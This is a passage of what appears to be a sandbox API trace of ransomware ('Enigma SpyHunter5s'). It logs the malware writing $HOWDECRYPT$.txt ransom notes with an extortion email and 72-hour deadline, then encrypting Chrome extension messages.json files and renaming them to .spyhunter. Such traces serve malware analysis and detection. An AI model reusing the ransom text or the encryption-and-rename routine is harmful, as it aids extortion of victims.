Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json.spyhunter") returned 168 [0160.161] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_cn\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_cn\\messages.json.spyhunter")) returned 1 [0160.165] GetProcessHeap () returned 0x2c0000 [0160.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0160.165] GetProcessHeap () returned 0x2c0000 [0160.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.165] GetProcessHeap () returned 0x2c0000 [0160.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7ee00 | out: hHeap=0x2c0000) returned 1 [0160.166] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.166] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.166] WriteFile (in: hFile=0x178, lpBuffer=0x25cea7b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ceba4, lpOverlapped=0x0 | out: lpBuffer=0x25cea7b*, lpNumberOfBytesWritten=0x25ceba4*=0x127, lpOverlapped=0x0) returned 1 [0160.167] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.167] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ceba4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ceba4*=0x2ac, lpOverlapped=0x0) returned 1 [0160.168] CloseHandle (hObject=0x178) returned 1 [0160.168] GetProcessHeap () returned 0x2c0000 [0160.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f199e0 | out: hHeap=0x2c0000) returned 1 [0160.168] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceb40 | out: pbBuffer=0x25ceb40) returned 1 [0160.168] GetProcessHeap () returned 0x2c0000 [0160.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.168] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ceb38*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ceb38*=0x30) returned 1 [0160.168] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.169] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json") returned 155 [0160.169] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0160.169] GetProcessHeap () returned 0x2c0000 [0160.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0160.169] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ceafc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ceafc*=0xdd, lpOverlapped=0x0) returned 1 [0160.170] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff23, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.170] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xdd, lpNumberOfBytesWritten=0x25ceafc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ceafc*=0xdd, lpOverlapped=0x0) returned 1 [0160.170] GetProcessHeap () returned 0x2c0000 [0160.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0160.170] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.170] WriteFile (in: hFile=0x178, lpBuffer=0x25ceb3c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ceafc, lpOverlapped=0x0 | out: lpBuffer=0x25ceb3c*, lpNumberOfBytesWritten=0x25ceafc*=0x4, lpOverlapped=0x0) returned 1 [0160.171] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ceafc, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25ceafc*=0x30, lpOverlapped=0x0) returned 1 [0160.171] CloseHandle (hObject=0x178) returned 1 [0160.171] GetProcessHeap () returned 0x2c0000 [0160.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0160.171] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json.spyhunter") returned 165 [0160.171] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json.spyhunter")) returned 1 [0160.172] GetProcessHeap () returned 0x2c0000 [0160.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0160.172] GetProcessHeap () returned 0x2c0000 [0160.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.172] GetProcessHeap () returned 0x2c0000 [0160.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f19858 | out: hHeap=0x2c0000) returned 1 [0160.172] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.173] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.173] WriteFile (in: hFile=0x178, lpBuffer=0x25cea73*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ceb9c, lpOverlapped=0x0 | out: lpBuffer=0x25cea73*, lpNumberOfBytesWritten=0x25ceb9c*=0x127, lpOverlapped=0x0) returned 1 [0160.174] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.174] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ceb9c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ceb9c*=0x2ac, lpOverlapped=0x0) returned 1 [0160.174] CloseHandle (hObject=0x178) returned 1 [0160.174] GetProcessHeap () returned 0x2c0000 [0160.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f196d0 | out: hHeap=0x2c0000) returned 1 [0160.174] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceb38 | out: pbBuffer=0x25ceb38) returned 1 [0160.174] GetProcessHeap () returned 0x2c0000 [0160.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.174] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ceb30*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ceb30*=0x30) returned 1 [0160.174] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.175] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json") returned 155 [0160.175] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0160.175] GetProcessHeap () returned 0x2c0000 [0160.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0160.175] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ceaf4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ceaf4*=0x177, lpOverlapped=0x0) returned 1 [0160.176] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffe89, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.176] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x177, lpNumberOfBytesWritten=0x25ceaf4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ceaf4*=0x177, lpOverlapped=0x0) returned 1 [0160.176] GetProcessHeap () returned 0x2c0000 [0160.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0160.176] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.176] WriteFile (in: hFile=0x178, lpBuffer=0x25ceb34*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ceaf4, lpOverlapped=0x0 | out: lpBuffer=0x25ceb34*, lpNumberOfBytesWritten=0x25ceaf4*=0x4, lpOverlapped=0x0) returned 1 [0160.177] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ceaf4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25ceaf4*=0x30, lpOverlapped=0x0) returned 1 [0160.177] CloseHandle (hObject=0x178) returned 1 [0160.177] GetProcessHeap () returned 0x2c0000 [0160.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0160.177] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json.spyhunter") returned 165 [0160.177] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json.spyhunter")) returned 1 [0160.178] GetProcessHeap () returned 0x2c0000 [0160.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0160.178] GetProcessHeap () returned 0x2c0000 [0160.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.178] GetProcessHeap () returned 0x2c0000 [0160.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f19548 | out: hHeap=0x2c0000) returned 1 [0160.178] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.179] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.179] WriteFile (in: hFile=0x178, lpBuffer=0x25cea6b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ceb94, lpOverlapped=0x0 | out: lpBuffer=0x25cea6b*, lpNumberOfBytesWritten=0x25ceb94*=0x127, lpOverlapped=0x0) returned 1 [0160.180] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.180] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ceb94, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ceb94*=0x2ac, lpOverlapped=0x0) returned 1 [0160.180] CloseHandle (hObject=0x178) returned 1 [0160.180] GetProcessHeap () returned 0x2c0000 [0160.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f193c0 | out: hHeap=0x2c0000) returned 1 [0160.180] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceb30 | out: pbBuffer=0x25ceb30) returned 1 [0160.180] GetProcessHeap () returned 0x2c0000 [0160.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.180] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ceb28*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ceb28*=0x30) returned 1 [0160.181] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.181] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json") returned 155 [0160.181] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0160.181] GetProcessHeap () returned 0x2c0000 [0160.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0160.182] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ceaec, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ceaec*=0x115, lpOverlapped=0x0) returned 1 [0160.182] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffeeb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.183] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x115, lpNumberOfBytesWritten=0x25ceaec, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ceaec*=0x115, lpOverlapped=0x0) returned 1 [0160.183] GetProcessHeap () returned 0x2c0000 [0160.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0160.183] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.183] WriteFile (in: hFile=0x178, lpBuffer=0x25ceb2c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ceaec, lpOverlapped=0x0 | out: lpBuffer=0x25ceb2c*, lpNumberOfBytesWritten=0x25ceaec*=0x4, lpOverlapped=0x0) returned 1 [0160.183] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ceaec, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25ceaec*=0x30, lpOverlapped=0x0) returned 1 [0160.183] CloseHandle (hObject=0x178) returned 1 [0160.183] GetProcessHeap () returned 0x2c0000 [0160.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0160.183] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json.spyhunter") returned 165 [0160.183] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json.spyhunter")) returned 1 [0160.185] GetProcessHeap () returned 0x2c0000 [0160.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0160.185] GetProcessHeap () returned 0x2c0000 [0160.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.185] GetProcessHeap () returned 0x2c0000 [0160.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f19238 | out: hHeap=0x2c0000) returned 1 [0160.185] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.186] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.186] WriteFile (in: hFile=0x178, lpBuffer=0x25cea63*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ceb8c, lpOverlapped=0x0 | out: lpBuffer=0x25cea63*, 